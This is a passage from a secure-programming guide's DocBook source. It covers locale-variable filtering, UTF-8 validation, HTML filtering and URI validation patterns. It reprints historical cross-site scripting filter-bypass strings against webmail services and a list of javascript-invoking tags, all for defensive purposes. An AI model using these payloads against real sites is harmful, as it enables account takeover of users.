LC_COLLATE, LC_CTYPE, LC_MONETARY, LC_NUMERIC, and LC_TIME).
For web applications, this user-requested set of language information
would be done via the Accept-Language request header or a form value
(the application should indicate the actual language setting of the
data being returned via the Content-Language heading).
You can check this value as part of your environment variable filtering if
your users can set your environment variables (i.e., setuid/setgid
programs) or as part of your input filtering (e.g., for CGI scripts).
The GNU C library "glibc" doesn't accept some values of LANG for
setuid/setgid programs (in particular anything with "/"),
but errors have been found in that filtering
(e.g., Red Hat released an update to fix this error in glibc
on September 1, 2000).
This kind of filtering isn't required by any standard, so you're
safer doing this filtering yourself.
I have not found any guidance on filtering language settings,
so here are my suggestions based on my own research into the issue.
</para>

<para>
First, a few words about the legal values of these settings.
Language settings are generally set using the standard tags defined
in IETF RFC 1766 (which uses two-letter country codes as its basic tag,
followed by an optional subtag separated by a dash; I've found that
environment variable settings use the underscore instead).
However, some find this insufficiently flexible, so three-letter country
codes may soon be used as well.
Also, there are two major not-quite compatible extended formats, the
X/Open Format and the CEN Format (European Community Standard);
you'd like to permit both.
Typical values include
``C'' (the C locale), ``EN'' (English''),
and ``FR_fr'' (French using the territory of France's conventions).
Also, so many people use nonstandard names that programs have had to develop
``alias'' systems to cope with nonstandard names
(for GNU gettext, see /usr/share/locale/locale.alias, and for X11, see
/usr/lib/X11/locale/locale.alias; you might need "aliases" instead of "alias");
they should usually be permitted as well.
Libraries like gettext() have to accept all these variants and find an
appropriate value, where possible.
One source of further information is FSF [1999];
another source is the li18nux.org web site.
A filter should not permit characters that aren't needed,
in particular ``/'' (which might permit escaping out of the trusted
directories) and ``..'' (which might permit going up one directory).
Other dangerous characters in NLSPATH
include ``%'' (which indicates substitution) and ``:''
(which is the directory separator); the documentation I have for other
machines suggests that some implementations may use them for other values,
so it's safest to prohibit them.
<!-- The Sun man page for "man locale" is disturbingly ambiguous on whether
     or not these characters affect values other than NLSPATH -->
</para>
</sect2>

<sect2 id="locale-bottom-line">
<title>Bottom Line</title>

<para>
In short, I suggest
simply erasing or re-setting the NLSPATH, unless you have a trusted user
supplying the value.
For the Accept-Language heading in HTTP (if you use it),
form values specifying the locale, and the environment variables
LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values listed
above,
filter the locales from untrusted users to permit null (empty) values or
to only permit values that match in total this regular expression
(note that I've recently added "="):
<programlisting width="61">
 [A-Za-z][A-Za-z0-9_,+@\-\.=]*
</programlisting>
<!-- I permit plus. Standard locale name from li18nux.org
     permits "=", so I added it; as of Feb 2002 they don't accept "+",
     which is needed to suport the CEN format. -->
I haven't found any legitimate locale which doesn't match this pattern,
but this pattern does appear to protect against locale attacks.
Of course, there's no guarantee that there are messages available
in the requested locale,
but in such a case these routines will fall back to the default
messages (usually in English), which at least is not a security problem.
<!-- I developed this pattern, after looking at the GLIBC specs in
     http://www.netppl.fi/~pp/glibc21/libc_8.html and the aliases on
     Red Hat 6.2 -->
</para>

<para>
If you wish to be really picky, and only patterns that match li18nux's
locale pattern, you can use this pattern instead:
<programlisting width="61">
 ^[A-Za-z]+(_[A-Za-z]+)?
 (\.[A-Z]+(\-[A-Z0-9]+)*)?
 (\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
  (,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
</programlisting>
In both cases, these patterns use POSIX's extended (``modern'')
regular expression notation (see regex(3) and regex(7) on Unix-like systems).
</para>

<!-- See John Levon's Bugtraq post on July 26, 2000 re internationalization
     and format strings.
-->

<para>
Of course, languages cannot be supported without a
standard way to represent their written symbols, which brings
us to the issue of character encoding.
</para>

</sect2>

</sect1>

<sect1 id="character-encoding">
<title>Character Encoding</title>

<sect2 id="character-encoding-intro">
<title>Introduction to Character Encoding</title>

<para>
For many years Americans have exchanged text using the ASCII character set;
since essentially all U.S. systems support ASCII,
this permits easy exchange of English text.
Unfortunately, ASCII is completely inadequate in handling the characters
of nearly all other languages.
For many years different countries have adopted different techniques for
exchanging text in different languages, making it difficult to exchange
data in an increasingly interconnected world.
</para>

<para>
More recently, ISO has developed ISO 10646,
the ``Universal Mulitple-Octet Coded Character Set (UCS).
UCS is a coded character set which
defines a single 31-bit value for each of all of the world's characters.
The first 65536 characters of the UCS (which thus fit into 16 bits)
are termed the ``Basic Multilingual Plane'' (BMP),
and the BMP is intended to cover nearly all of today's spoken languages.
The Unicode forum develops the Unicode standard, which concentrates on
the UCS and adds some additional conventions to aid interoperability.
Historically, Unicode and ISO 10646 were developed by competing groups,
but thankfully they realized that they needed to work together and they now
coordinate with each other.
</para>

<para>
If you're writing new software that handles internationalized characters,
you should be using ISO 10646/Unicode as your basis for handling
international characters.
However, you may need to process older documents in various older
(language-specific) character sets, in which case, you need to ensure that
an untrusted user cannot control the setting of another document's
character set (since this would significantly affect the document's
interpretation).
</para>
</sect2>

<sect2 id="character-encoding-utf8">
<title>Introduction to UTF-8</title>

<para>
Most software is not designed to handle 16 bit or 32 bit characters,
yet to create a universal character set more than 8 bits was required.
Therefore, a special format called ``UTF-8'' was developed to encode these
potentially international
characters in a format more easily handled by existing programs and libraries.
UTF-8 is defined, among other places, in IETF RFC 2279, so it's a
well-defined standard that can be freely read and used.
UTF-8 is a variable-width encoding; characters numbered 0 to 0x7f (127)
encode to themselves as a single byte,
while characters with larger values are encoded into 2 to 6 bytes of
information (depending on their value).
The encoding has been specially designed to have the following
nice properties (this information is from the RFC and Linux utf-8 man page):

<itemizedlist>
<listitem><para>
       The classical US ASCII characters (0 to 0x7f) encode as themselves,
       so files  and strings  which  contain only 7-bit ASCII characters
       have the same encoding under both ASCII and UTF-8.
       This is fabulous for backward compatibility with the many existing
       U.S. programs and data files.
</para></listitem>

<listitem><para>
       All UCS characters beyond 0x7f are  encoded  as  a  multibyte
       sequence  consisting  only of bytes in the range 0x80 to 0xfd.
       This means that no ASCII byte can appear  as  part  of  another
       character.  Many other encodings permit characters such as an
       embedded NIL, causing programs to fail.
</para></listitem>

<listitem><para>
       It's easy to convert between UTF-8 and a 2-byte or 4-byte
       fixed-width representations of characters (these are called
       UCS-2 and UCS-4 respectively).
</para></listitem>

<listitem><para>
       The lexicographic sorting order of UCS-4 strings is preserved,
       and the Boyer-Moore fast search algorithm can be used directly
       with UTF-8 data.
</para></listitem>

<listitem><para>
       All  possible 2^31 UCS codes can be encoded using UTF-8.
</para></listitem>

<listitem><para>
       The  first byte of a multibyte sequence which represents
       a single non-ASCII UCS character is always in the  range
       0xc0  to  0xfd  and  indicates  how  long this multibyte
       sequence is. All further bytes in a  multibyte  sequence
       are  in  the range 0x80 to 0xbf. This allows easy resynchronization;
       if a byte is missing, it's easy to skip forward to the ``next''
       character, and it's always easy to skip forward and back to the
       ``next'' or ``preceding'' character.
</para></listitem>

</itemizedlist>
</para>


<para>
In short, the UTF-8 transformation format is becoming a dominant method
for exchanging international text information because it can support all of the
world's languages, yet it is backward compatible with U.S. ASCII files
as well as having other nice properties.
For many purposes I recommend its use, particularly when storing data
in a ``text'' file.
</para>
</sect2>

<sect2 id="utf8-security-issues">
<title>UTF-8 Security Issues</title>


<para>
The reason to mention UTF-8 is that
some byte sequences are not legal UTF-8, and
this might be an exploitable security hole.
UTF-8 encoders are supposed to use the ``shortest possible''
encoding, but naive decoders may accept encodings that are longer than
necessary.
Indeed, earlier standards permitted decoders to accept
``non-shortest form'' encodings.
The problem here is that this means that potentially dangerous
input could be represented multiple ways, and thus might
defeat the security routines checking for dangerous inputs.
The RFC describes the problem this way:

<blockquote>
<para>
Implementers of UTF-8 need to consider the security aspects of how
they handle illegal UTF-8 sequences.  It is conceivable that in some
circumstances an attacker would be able to exploit an incautious
UTF-8 parser by sending it an octet sequence that is not permitted by
the UTF-8 syntax.
</para>

<para>
A particularly subtle form of this attack could be carried out
against a parser which performs security-critical validity checks
against the UTF-8 encoded form of its input, but interprets certain
illegal octet sequences as characters.  For example, a parser might
prohibit the NUL character when encoded as the single-octet sequence
00, but allow the illegal two-octet sequence C0 80 (illegal because
it's longer than necessary) and interpret it
as a NUL character (00).  Another example might be a parser which
prohibits the octet sequence 2F 2E 2E 2F ("/../"), yet permits the
illegal octet sequence 2F C0 AE 2E 2F.
</para>
</blockquote>

</para>

<para>
A longer discussion about this is available at
Markus Kuhn's
<emphasis remap="it">UTF-8 and Unicode FAQ for Unix/Linux</emphasis> at
<ulink
url="http://www.cl.cam.ac.uk/~mgk25/unicode.html">http://www.cl.cam.ac.uk/~mgk25/unicode.html</ulink>.
</para>
</sect2>

<sect2 id="utf8-legal-values">
<title>UTF-8 Legal Values</title>

<para>
Thus, when accepting UTF-8 input, you need to check if the input is
valid UTF-8.
Here is a list of all legal UTF-8 sequences; any character
sequence not matching this table is not a legal UTF-8 sequence.
In the following table, the first column shows the various character
values being encoded into UTF-8.
The second column shows how those characters are encoded as binary values;
an ``x'' indicates where the data is placed (either a 0 or 1), though
some values should not be allowed because they're not the shortest possible
encoding.
The last row shows the valid values each byte can have
(in hexadecimal).
Thus, a program should check that every character meets one of the patterns
in the right-hand column.
A ``-'' indicates a range of legal values (inclusive).
Of course, just because a sequence is a legal UTF-8 sequence doesn't
mean that you should accept it (you still need to do all your other
checking), but generally you should check any UTF-8 data for UTF-8 legality
before performing other checks.
<table>
<title>Legal UTF-8 Sequences</title>
<tgroup cols="3">
<colspec colname="UCS">
<colspec colname="binary-range">
<colspec colname="hex">
<thead>
<row><entry>UCS Code (Hex)</entry><entry>Binary UTF-8 Format</entry><entry>Legal UTF-8 Values (Hex)</entry></row>
</thead>
<tbody>
<row><entry>00-7F</entry><entry>0xxxxxxx</entry><entry>00-7F</entry></row>
<row><entry>80-7FF</entry><entry>110xxxxx 10xxxxxx</entry><entry>C2-DF 80-BF</entry></row>
<row><entry>800-FFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E0 A0*-BF 80-BF</entry></row>
<row><entry>1000-FFFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E1-EF 80-BF 80-BF</entry></row>
<row><entry>10000-3FFFF</entry> <entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F0 90*-BF 80-BF 80-BF</entry></row>
<row><entry>40000-FFFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F1-F3 80-BF 80-BF 80-BF</entry></row>
<row><entry>40000-FFFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F1-F3 80-BF 80-BF 80-BF</entry></row>
<row><entry>100000-10FFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F4 80-8F* 80-BF 80-BF</entry></row>
<row><entry>200000-3FFFFFF</entry><entry>111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
<row><entry>04000000-7FFFFFFF</entry><entry>1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
</tbody>
</tgroup>
</table>
</para>
<!-- From: http://www.unicode.org/unicode/uni2errata/UTF-8_Corrigendum.html -->

<para>
As I noted earlier, there are two standards for character sets,
ISO 10646 and Unicode, who have agreed to synchronize their
character assignments.
The definition of UTF-8 in ISO/IEC 10646-1:2000 and the IETF RFC
also currently support
five and six byte sequences to encode characters outside the range
supported by Uniforum's Unicode, but such values can't be used to
support Unicode characters and it's expected that a future version of
ISO 10646 will have the same limits.
<!--  http://www.unicode.org/unicode/reports/tr27/#relation -->
Thus, for most purposes the five and six byte UTF-8 encodings aren't legal,
and you should normally reject them (unless you have a special purpose
for them).
</para>

<para>
This is set of valid values is tricky to determine, and in fact
earlier versions of this document got some entries
wrong (in some cases it permitted overlong characters).
Language developers should include a function in their libraries
to check for valid UTF-8 values, just because it's so hard to get right.
</para>

<para>
I should note that in some cases, you might want to cut slack (or use
internally) the hexadecimal sequence C0 80.  This is an overlong sequence
that, if permitted, can represent ASCII NUL (NIL).  Since C and C++
have trouble including a NIL character in an ordinary string,
some people have taken
to using this sequence when they want to represent NIL as part of the
data stream; Java even enshrines the practice.
Feel free to use C0 80 internally while processing data, but technically
you really should translate this back to 00 before saving the data.
Depending on your needs, you might decide to be ``sloppy'' and accept
C0 80 as input in a UTF-8 data stream.
If it doesn't harm security, it's probably a good practice to accept this
sequence since accepting it aids interoperability.
</para>

<para>
Handling this can be tricky.
You might want to examine the C routines developed by Unicode to
handle conversions, available at
<ulink url="ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c">
ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c</ulink>.
It's unclear to me if these routines are open source software (the
licenses don't clearly say whether or not they can be modified), so
beware of that.
</para>

</sect2>


<sect2 id="utf8-related-issues">
<title>UTF-8 Related Issues</title>

<para>
This section has discussed UTF-8, because it's the most popular
multibyte encoding of UCS, simplifying a lot of international text
handling issues.
However, it's certainly not the only encoding; there are other encodings,
such as UTF-16 and UTF-7, which have the same kinds of issues and
must be validated for the same reasons.
</para>

<para>
Another issue is that some phrases can be expressed in more than one
way in ISO 10646/Unicode.
For example, some accented characters can be represented as a single
character (with the accent) and also as a set of characters
(e.g., the base character plus a separate composing accent).
These two forms may appear identical.
There's also a zero-width space that could be inserted, with the
result that apparently-similar items are considered different.
Beware of situations where such hidden text could interfere with the program.
This is an issue that in general is hard to solve; most programs don't
have such tight control over the clients that they know completely how
a particular sequence will be displayed (since this depends on the
client's font, display characteristics, locale, and so on).
</para>

</sect2>

</sect1>

<sect1 id="input-protection-cross-site">
<title>Prevent Cross-site Malicious Content on Input</title>

<para>
Some programs accept data from one untrusted user and pass that data
on to a second user; the second user's application may then process that
data in a way harmful to the second user.
This is a particularly common problem for web applications,
we'll call this problem ``cross-site malicious content.''
In short, you cannot accept input (including any form data)
without checking, filtering, or encoding it.
For more information, see
<xref linkend="cross-site-malicious-content">.
</para>

<para>
Fundamentally, this means that all web application input must be
filtered (so characters that can cause this problem are removed),
encoded (so the characters that can cause this problem are encoded in
a way to prevent the problem), or
validated (to ensure that only ``safe'' data gets through).
Filtering and validation should often be done at the input, but
encoding can be done either at input or output time.
If you're just passing the data through without analysis, it's probably
better to encode the data on input (so it won't be forgotten), but
if you're processing the data, there are arguments for encoding on
output instead.
</para>

</sect1>


<sect1 id="filter-html">
<title>Filter HTML/URIs That May Be Re-presented</title>

<para>
One special case where cross-site malicious content must be
prevented are web applications
which are designed to accept HTML or XHTML from one user, and then send it on
to other users
(see <xref linkend="cross-site-malicious-content"> for
more information on cross-site malicious content).
The following subsections discuss filtering this specific kind of input,
since handling it is such a common requirement.
</para>

<sect2 id="remove-html-tags">
<title>Remove or Forbid Some HTML Data</title>

<para>
It's safest to remove all possible (X)HTML tags so they cannot affect anything,
and this is relatively easy to do.
As noted above, you should already be identifying the list of legal
characters, and rejecting or removing those characters that aren't
in the list.
In this filter, simply don't include the following characters in
the list of legal characters: ``&lt;'', ``&gt;'', and ``&amp;'' (and if
they're used in attributes, the double-quote character ``&quot;'').
If browsers only operated according the HTML specifications, the ``&gt"''
wouldn't need to be removed, but in practice it must be removed.
This is because some browsers assume that the author of the page
really meant to put in an opening "&lt;" and ``helpfully'' insert one -
attackers can exploit this behavior and use the "&gt;" to create an
undesired "&lt;".
<!-- CERT http://www.cert.org/tech_tips/malicious_code_mitigation.html -->
</para>

<para>
Usually the character set for transmitting HTML is
ISO-8859-1 (even when sending international text),
so the filter should also omit most control characters (linefeed and
tab are usually okay) and characters with their high-order bit set.
</para>

<para>
One problem with this approach is that it can really surprise users,
especially those entering international text if all international
text is quietly removed.
If the invalid characters are quietly removed without warning,
that data will be irrevocably lost and cannot be reconstructed later.
One alternative is forbidding such characters and sending error messages
back to users who attempt to use them.
This at least warns users, but doesn't give them the functionality
they were looking for.
Other alternatives are encoding this data or validating this data,
which are discussed next.
</para>
</sect2>

<sect2 id="encoding-html-tags">
<title>Encoding HTML Data</title>

<para>
An alternative that is nearly as safe
is to transform the critical characters so they won't
have their usual meaning in HTML.
This can be done by translating all "&lt;" into "&amp;lt;",
"&gt;" into "&amp;gt;", and "&amp;" into "&amp;amp;".
Arbitrary international characters can be encoded in Latin-1
using the format "&amp;#value;" - do not forget the ending semicolon.
Encoding the international characters means you must know what the
input encoding was, of course.
</para>

<para>
One possible danger here is that if these encodings are accidentally
interpreted twice, they will become a vulnerability.
However, this approach at least permits later users to see the
"intent" of the input.
</para>
</sect2>

<sect2 id="Validating-html-tags">
<title>Validating HTML Data</title>

<para>
Some applications, to work at all, must accept HTML from third parties
and send them on to their users.
Beware - you are treading dangerous ground at this point; be sure
that you really want to do this.
Even the idea of accepting HTML from arbitrary places
is controversial among some security practitioners, because it is extremely
difficult to get it right.
</para>

<para>
However, if your application must accept HTML, and you believe
that it's worth the risk, at least identify a list
of ``safe'' HTML commands and only permit those commands.
</para>

<para>
Here is a minimal set of safe HTML tags
that might be useful for applications (such as guestbooks)
that support short comments:
&lt;p&gt; (paragraph),
&lt;b&gt; (bold),
&lt;i&gt; (italics),
&lt;em&gt; (emphasis),
&lt;strong&gt; (strong emphasis),
&lt;pre&gt; (preformatted text),
&lt;br&gt; (forced line break - note it doesn't require a closing tag),
as well as all their ending tags.
</para>

<para>
Not only do you need to ensure that only a small set
of ``safe'' HTML commands are accepted, you also need to ensure
that they are properly nested and closed
(i.e., that the HTML commands are ``balanced'').
In XML, this is termed ``well-formed'' data.
A few exceptions could be made if you're accepting standard HTML
(e.g., supporting an implied &lt;/p&gt; where not provided before a
&lt;p&gt; would be fine), but trying to accept HTML in its full
generality (which can infer balancing closing tags in many cases)
is not needed for most applications.
Indeed, if you're trying to stick to XHTML (instead of HTML), then
well-formedness is a requirement.
Also, HTML tags are case-insensitive; tags can be upper case,
lower case, or a mixture.
However, if you intend to accept XHTML
then you need to require all tags to be in lower case
(XML is case-sensitive; XHTML uses XML and requires the tags to be
in lower case).
</para>

<para>
Here are a few random tips about doing this.
Usually you should design whatever surrounds the HTML text and the
set of permitted tags so that the contributed text cannot be misinterpreted
as text from the ``main'' site (to prevent forgeries).
Don't accept any attributes unless you've checked the attribute type and
its value; there are many attributes that support things such as
Javascript that can cause trouble for your users.
You'll notice that in the above list I didn't include any attributes at all,
which is certainly the safest course.
You should probably give a warning message if an unsafe tag is used,
but if that's not practical, encoding the critical characters
(e.g., "&lt;" becomes "&amp;lt;") prevents data loss while
simultaneously keeping the users safe.
</para>

<para>
Be careful when expanding this set, and in general be restrictive of
what you accept.
If your patterns are too generous, the browser may interpret the
sequences differently than you expect, resulting in a potential
exploit.
For example, FozZy posted on Bugtraq (1 April 2002)
some sequences that permitted
exploitation in various web-based mail systems,
which may give you an idea of the kinds of problems you need to defend
against.
Here's some exploit text that, at one time, could
subvert user accounts in Microsoft Hotmail:
<programlisting>
<![CDATA[
   <SCRIPT>
   </COMMENT>
   <!-- --> -->
]]>
</programlisting>
Here's some similar exploit text for Yahoo! Mail:
<programlisting>
<![CDATA[
  <_a<script>
  <<script>        (Note: this was found by BugSan)
]]>
</programlisting>
Here's some exploit text for Vizzavi:
<programlisting>
<![CDATA[
  <b onmousover="...">go here</b>
  <img [line_break] src="javascript:alert(document.location)">
]]>
</programlisting>

Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various
text that invokes Javascript yet manages to bypass many filters.
Here are his examples (which he says he cut and pasted from elsewhere);
some only apply to specific browsers
(IE means Internet Explorer, N4 means Netscape version 4).
<programlisting>
<![CDATA[
  <a href="javas&#99;ript&#35;[code]">
  <div onmouseover="[code]">
  <img src="javascript:[code]">
  <img dynsrc="javascript:[code]"> [IE]
  <input type="image" dynsrc="javascript:[code]"> [IE]
  <bgsound src="javascript:[code]"> [IE]
  &<script>[code]</script>
  &{[code]}; [N4]
  <img src=&{[code]};> [N4]
  <link rel="stylesheet" href="javascript:[code]">
  <iframe src="vbscript:[code]"> [IE]
  <img src="mocha:[code]"> [N4]
  <img src="livescript:[code]"> [N4]
  <a href="about:<s&#99;ript>[code]</script>">
  <meta http-equiv="refresh" content="0;url=javascript:[code]">
  <body onload="[code]">
  <div style="background-image: url(javascript:[code]);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression([code]);"> [IE]
  <style type="text/javascript">[code]</style> [N4]
  <object classid="clsid:..." codebase="javascript:[code]"> [IE]
  <style><!--</style><script>[code]//--></script>
  <!-- -- --><script>[code]</script><!-- -- -->
  <<script>[code]</script>
  <img src="blah"onmouseover="[code]">
  <img src="blah>" onmouseover="[code]">
  <xml src="javascript:[code]">
  <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
  <![CDATA[<!--]] ><script>[code]//--></script>

]]>
<!-- I inserted a space after ]] just above. -->
</programlisting>
This is not a complete list, of course, but it at least is a sample
of the kinds of attacks that you must prevent by strictly limiting the
tags and attributes you can allow from untrusted users.
</para>
<para>
Konstantin Riabitsev has posted
<ulink url="http://www.mricon.com/html/phpfilter.html">
some PHP code to filter HTML</ulink> (GPL);
I've not examined it closely, but you might want to take a look.
</para>
</sect2>

<sect2 id="Validating-uris">
<title>Validating Hypertext Links (URIs/URLs)</title>

<para>
Careful readers will notice that I did not include the hypertext link tag
&lt;a&gt; as a safe tag in HTML.
Clearly, you could add
&lt;a href="safe URI"&gt; (hypertext link) to the safe list
(not permitting any other attributes unless you've checked their
contents).
If your application requires it, then do so.
However, permitting third parties to create links
is much less safe, because defining a ``safe URI''<footnote>
<para>
Technically, a hypertext link can be any ``uniform resource
identifier'' (URI).
The term "Uniform Resource Locator" (URL) refers to the subset of URIs
that identify resources via a representation of their primary access
mechanism (e.g., their network "location"), rather than identifying
the resource by name or by some other attribute(s) of that resource.
Many people use the term ``URL'' as synonymous with ``URI'', since URLs
are the most common kind of URI.
For example, the encoding used in URIs is actually called ``URL encoding''.
</para>
</footnote>
turns out to be very difficult.
Many browsers accept
all sorts of URIs which may be dangerous to the user.
This section discusses how to validate URIs from third parties for
re-presenting to others, including URIs incorporated into HTML.
</para>

<para>
First, let's look briefly at URI syntax (as defined by various specifications).
URIs can be either ``absolute'' or ``relative''.
The syntax of an absolute URI looks like this:
<programlisting>
scheme://authority[path][?query][#fragment]
</programlisting>
A URI starts with a scheme name (such as ``http''), the characters ``://'',
the authority (such as ``www.dwheeler.com''), a path
(which looks like a directory or file name), a question mark followed by
a query, and a hash (``#'') followed by a fragment identifier.
The square brackets surround optional portions - e.g., many URIs don't
actually include the query or fragment.
Some schemes may not permit some of the data (e.g., paths, queries, or
fragments), and many schemes have additional requirements unique to them.
Many schemes permit the ``authority'' field to identify
optional usernames, passwords, and ports, using this syntax for the
``authority'' section:
<programlisting>
 [username[:password]@]host[:portnumber]
</programlisting>
The ``host'' can either be a name (``www.dwheeler.com'') or an IPv4
numeric address (127.0.0.1).
A ``relative'' URI references one object relative to the ``current'' one,
and its syntax looks a lot like a filename:
<programlisting>
path[?query][#fragment]
</programlisting>
There are a limited number of characters permitted in most of the URI,
so to get around this problem, other 8-bit characters may be ``URL encoded''
as %hh (where hh is the hexadecimal value of the 8-bit character).
For more detailed information on valid URIs, see IETF RFC 2396 and its
related specifications.
</para>

<para>
Now that we've looked at the syntax of URIs, let's examine the risks
of each part:
<itemizedlist>
<listitem><para>Scheme:
Many schemes are downright dangerous.
Permitting someone to insert a ``javascript'' scheme into your material
would allow them to trivially mount denial-of-service attacks
(e.g., by repeatedly creating windows so the user's machine freezes or
becomes unusable).
More seriously, they might be able to exploit a known vulnerability in
the javascript implementation.
Some schemes can be a nuisance, such as ``mailto:'' when a mailing
is not expected, and some schemes may not be sufficiently secure
on the client machine.
Thus, it's necessary to limit the set of allowed schemes to
just a few safe schemes.
</para></listitem>
<listitem><para>Authority:
Ideally, you should limit user links to ``safe'' sites, but this is
difficult to do in practice.
However, you can certainly do something about usernames, passwords,
and port numbers: you should forbid them.
Systems expecting usernames (especially with passwords!) are probably
guarding more important material;
rarely is this needed in publicly-posted URIs, and someone could try
to use this functionality to convince users
to expose information they have access to and/or
use it to modify the information.
Such URIs permit semantic attacks; see
<xref linkend="semantic-attacks">
for more information.
Usernames without passwords are no less dangerous, since browsers typically
cache the passwords.
You should not usually permit specification of ports, because
different ports expect different protocols and the resulting
``protocol confusion'' can produce an exploit.
For example, on some systems it's possible to use the ``gopher'' scheme
and specify the SMTP (email) port to cause a user to send email of the
attacker's choosing.
You might permit a few special cases (e.g., http ports 8008 and 8080),
but on the whole it's not worth it.
The host when specified by name actually has a fairly limited character set
(using the DNS standards).
Technically, the standard doesn't permit the underscore (``_'') character,
but Microsoft ignored this part of the standard and even requires the
use of the underscore in some circumstances, so you probably should allow it.
Also, there's been a great deal of work on supporting international
characters in DNS names, which is not further discussed here.
</para></listitem>
<listitem><para>Path:
Permitting a path is usually okay, but unfortunately some applications
use part of the path as query data, creating an opening we'll discuss next.
Also, paths are allowed to contain phrases like ``..'', which can expose
private data in a poorly-written web server;
this is less a problem than it once was and really should be fixed
by the web server.
Since it's only the phrase ``..'' that's special, it's reasonable to
look at paths (and possibly query data) and forbid ``../'' as a content.
However, if your validator permits URL escapes, this can be difficult;
now you need to prevent versions where some of these characters are
escaped, and may also have to deal with various ``illegal'' character
encodings of these characters as well.
</para></listitem>
<listitem><para>Query:
Query formats (beginning with "?") can be a security risk
because some query formats actually cause actions to occur on the serving end.
They shouldn't, and your applications shouldn't, as discussed in
<xref linkend="avoid-get-non-queries"> for more information.
However, we have to acknowledge the reality as a serious problem.
In addition, many web sites are actually ``redirectors'' - they take a
parameter specifying where the user should be redirected, and send back
a command redirecting the user to the new location.
If an attacker references such sites and provides
a more dangerous URI as the redirection value, and the
browser blithely obeys the redirection, this could be a problem.
Again, the user's browser should be more careful, but not all user
browsers are sufficiently cautious.
Also, many web applications have vulnerabilities that can be
exploited with certain query values, but in general this is hard to
prevent.
The official URI specifications don't sanction the ``+'' (plus) character,
but in practice the ``+'' character often represents the space character.
</para></listitem>
<listitem><para>Fragment:
Fragments basically locate a portion of a document; I'm unaware of
an attack based on fragments as long as the syntax is legal, but the
legality of its syntax does need checking.
Otherwise, an attacker might be able to insert a character such as the
double-quote (") and prematurely end the URI (foiling any checking).
</para></listitem>
<listitem><para>URL escapes:
URL escapes are useful because they can represent arbitrary 8-bit
characters; they can also be very dangerous for the same reasons.
In particular, URL escapes can represent control characters, which many
poorly-written web applications are vulnerable to.
In fact, with or without URL escapes, many web applications are vulnerable
to certain characters (such as backslash, ampersand, etc.), but again
this is difficult to generalize.
</para></listitem>
<listitem><para>Relative URIs:
Relative URIs should be reasonably safe (if you manage the web site well),
although in some applications there's no good reason to allow them either.
</para></listitem>
</itemizedlist>
Of course, there is a trade-off with simplicity as well.
Simple patterns are easier to understand, but
they aren't very refined (so they tend to be too permissive or
too restrictive, even more than a refined pattern).
Complex patterns can be more exact, but they are more likely to have
errors, require more performance to use, and can be hard to
implement in some circumstances.
</para>


<para>
Here's my suggestion for a ``simple mostly safe'' URI pattern which is
very simple and can be implemented ``by hand'' or through a regular
expression; permit the following pattern:
<programlisting width="79">
(http|ftp|https)://[-A-Za-z0-9._/]+
</programlisting>
</para>

<para>
This pattern doesn't permit many potentially dangerous capabilities
such as queries, fragments, ports, or relative URIs,
and it only permits a few schemes.
It prevents the use of the ``%'' character, which is used in URL escapes
and can be used to specify characters that the server may not be
prepared to handle.
Since it doesn't permit either ``:'' or URL escapes, it doesn't permit
specifying port numbers, and even using it to redirect to a
more dangerous URI would be difficult (due to the lack of the escape character).
It also prevents the use of a number of other characters; again, many
poorly-designed web applications can't handle a number of
``unexpected'' characters.
</para>

<para>
Even this ``mostly safe'' URI permits
a number of questionable URIs, such as
subdirectories (via ``/'') and attempts to move up directories (via `..'');
illegal queries of this kind should be caught by the server.
It permits some illegal host identifiers (e.g., ``20.20''),
though I know of no case where this would be a security weakness.
Some web applications treat subdirectories as query data (or worse,
as command data); this is hard to prevent in general since finding
``all poorly designed web applications'' is hopeless.
You could prevent the use of all paths, but this would make it
impossible to reference most Internet information.
The pattern also allows references to local server information
(through patterns such as "http:///", "http://localhost/", and
"http://127.0.0.1") and access to servers on an internal network;
here you'll have to depend on the servers correctly interpreting the
resulting HTTP GET request as solely a request for information and not
a request for an action,
as recommended in <xref linkend="avoid-get-non-queries">.
Since query forms aren't permitted by this pattern, in many environments
this should be sufficient.
</para>

<para>
Unfortunately, the ``mostly safe''
pattern also prevents a number of quite legitimate and useful URIs.
For example,
many web sites use the ``?'' character to identify specific documents
(e.g., articles on a news site).
The ``#'' character is useful for specifying specific sections of a document,
and permitting relative URIs can be handy in a discussion.
Various permitted characters and URL escapes aren't included in the
``mostly safe'' pattern.
For example, without permitting URL escapes, it's difficult to access
many non-English pages.
If you truly need such functionality, then you can use less safe patterns,
realizing that you're exposing your users to higher risk while
giving your users greater functionality.
</para>

<para>
One pattern that permits queries, but at
least limits the protocols and ports used is the following,
which I'll call the ``simple somewhat safe pattern'':
<programlisting width="79">
 (http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
</programlisting>
This pattern actually isn't very smart, since it permits illegal escapes,
multiple queries, queries in ftp, and so on.
It does have the advantage of being relatively simple.
</para>

<para>
Creating a ``somewhat safe'' pattern that really limits URIs
to legal values is quite difficult.
Here's my current attempt to do so, which I call
the ``sophisticated somewhat safe pattern'', expressed in a form
where whitespace is ignored and comments are introduced with "#":
<!-- Warning!  If you are cutting and pasting this pattern, make sure that
  the "&amp;" is turned back into an ampersand, and that the whitespace
